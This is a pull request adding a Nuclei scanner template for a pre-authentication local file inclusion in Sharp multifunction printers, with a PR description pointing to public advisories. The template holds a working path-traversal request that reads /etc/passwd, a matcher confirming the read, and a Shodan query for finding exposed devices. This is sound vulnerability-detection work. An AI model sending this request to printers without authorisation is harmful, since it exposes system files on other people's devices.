### PR TITLE
Create sharp-multi-function-printers-local-file-disclosure.yaml

### DIFF
--- a/http/vulnerabilities/other/sharp-multi-function-printers-local-file-disclosure.yaml
+++ b/http/vulnerabilities/other/sharp-multi-function-printers-local-file-disclosure.yaml
@@ -1,0 +1,34 @@
+id: sharp-multi-function-printers-local-file-disclosure
+
+info:
+  name: Sharp Multifunction Printers - Local File Inclusion
+  author: gy741
+  severity: high
+  description: |
+    It was observed that Sharp printers are vulnerable to a local file inclusion without authentication. Any attacker can read any file located in the printer.
+  remediation: Apply all relevant security patches and product upgrades.
+  reference:
+    - https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html#pre-auth-lfi
+    - https://jvn.jp/en/vu/JVNVU93051062/index.html
+    - https://global.sharp/products/copier/info/info_security_2024-05.html
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: "Set-Cookie: MFPSESSIONID="
+  tags: sharp,printer,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/installed_emanual_down.html?path=/manual/../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200

--- a/http/vulnerabilities/other/sharp-printers-lfi.yaml
+++ b/http/vulnerabilities/other/sharp-printers-lfi.yaml
@@ -1,4 +1,4 @@
-id: sharp-multi-function-printers-local-file-disclosure
+id: sharp-printers-lfi
 
 info:
   name: Sharp Multifunction Printers - Local File Inclusion
@@ -6,7 +6,8 @@ info:
   severity: high
   description: |
     It was observed that Sharp printers are vulnerable to a local file inclusion without authentication. Any attacker can read any file located in the printer.
-  remediation: Apply all relevant security patches and product upgrades.
+  remediation: |
+    Apply all relevant security patches and product upgrades.
   reference:
     - https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html#pre-auth-lfi
     - https://jvn.jp/en/vu/JVNVU93051062/index.html
@@ -28,6 +29,11 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream; name=passwd"
 
       - type: status
         status:


### PR DESCRIPTION
### Template / PR Information

Hello,

Added Sharp Multifunction Printers - Local File Inclusion Template 

```
It was observed that Sharp printers are vulnerable to a local file inclusion without authentication. Any attacker can read any file located in the printer.
```

- References: https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html#pre-auth-lfi

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)